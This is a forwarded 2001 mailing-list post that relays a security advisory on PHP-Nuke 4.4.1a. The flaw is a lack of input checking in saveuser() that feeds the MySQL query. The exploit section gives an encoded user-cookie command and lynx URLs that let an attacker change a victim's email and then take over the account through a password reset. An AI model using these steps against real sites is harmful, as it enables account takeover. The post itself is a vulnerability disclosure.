-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Any of the devel guys work on this one? It's been all over bugtraq.... Probably one of the most insecure php programs in a long time. - ----- Original Message ----- From: "venomous" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Sent: Friday, March 02, 2001 6:44 AM Subject: PHPNUKE4.4.1a Advisory > r 0 t t e n d e v 1 c e C r e w > r0tten dev1ce Crew > > A r g e n t i n i a n S e c u r i t y G r o u p > Argentinian Security Group > > <[( advisory )]>---------------------------------------<[( > rdC270201.adv.en > > Programa: PHP-NUKE > Vendor Homepage: http://www.phpnuke.org > Vendor Contacted: 27/feb/2001 > Vendor Response: ??/??/?? > Vendor Fix: ??/??/?? > Version tested: 4.4.1a (latest version to date) > Found by: venomous > English translation: ka0z > > - Problem description: > ~~~~~~~~~~~~~~~~~~~~ > > The checks that are realized in the function saveuser() are not > enough to block abitrary information being passed to the query of > MySQL. > [!] There are also many other functions that can be exploited the > same way described in the advisory. This adivisory describes only > the function saveuser(). > > - Impact: > ~~~~~~~ > > It's possible for the attacker to change the e-mail address of one > of the users and ask for the password to be sent to the e-mail > address that the attacker have provided. > Of course this isn't easy since we do not know the UID of each of > the users, but this this type of information is easily obtained > with > bruteforce checks. > > - Exploit: > ~~~~~~~~ > > powerhouse:~$ /bin/echo -e "0:<user>:2:3:4:5:6:7:8:eee" | uuencode > -m f begin-base64 644 f > MDpBbm9ueW1vdXM6MjozOjQ6NTo2Ojc6ODplZWUK [***] > > lynx > http://victim/user.php?op=saveuser&user=[***]&uid=X&uname=<user> > > The variables you can change the value are: > > name='',email='', femail='', url='', bio='' , user_avatar='', > user_icq='', user_occ='', user_from='', user_intrest='', > user_sig='', user_aim='', user_yim='', user_msnm='' > > In other words, if we want to change the e-mail address, we do: > > lynx > http://victim/user.php&op=saveuser&user=[***]&uid=X&uname=<user>&ema > il= <email you want> > > If you ask for the password to be sent to e-mail, you would be able > to access the account. > > - Code: > ~~~~~ > > Very simple script to demostrate the vulnerability: > > You can get it from http://www.rdcrew.com.ar, code section. > > - Fix: > ~~~~ > > Wait for a patch from the author. > > > - Contact us: > ~~~~~~~~~~~ > > Advisories, tools, IDS, texts and other stuff can be found at: > http://www.rdcrew.com.ar > > > [EMAIL PROTECTED] > > - Greets: > ~~~~~~~ > > people: ka0z, den0, E|Bruj0, storm, ab. > channels: #flatline at coredumped > [EOF] -----BEGIN PGP SIGNATURE----- Version: PGP 7.0.1 iQA/AwUBOqL/IJcaE5Cuy9BdEQLx9wCcCD2ufgR5rSpyNhqrTiohbtikw9EAoOy6 P50SoAzfYry3WBdnQofBIdrR =wkcL -----END PGP SIGNATURE-----
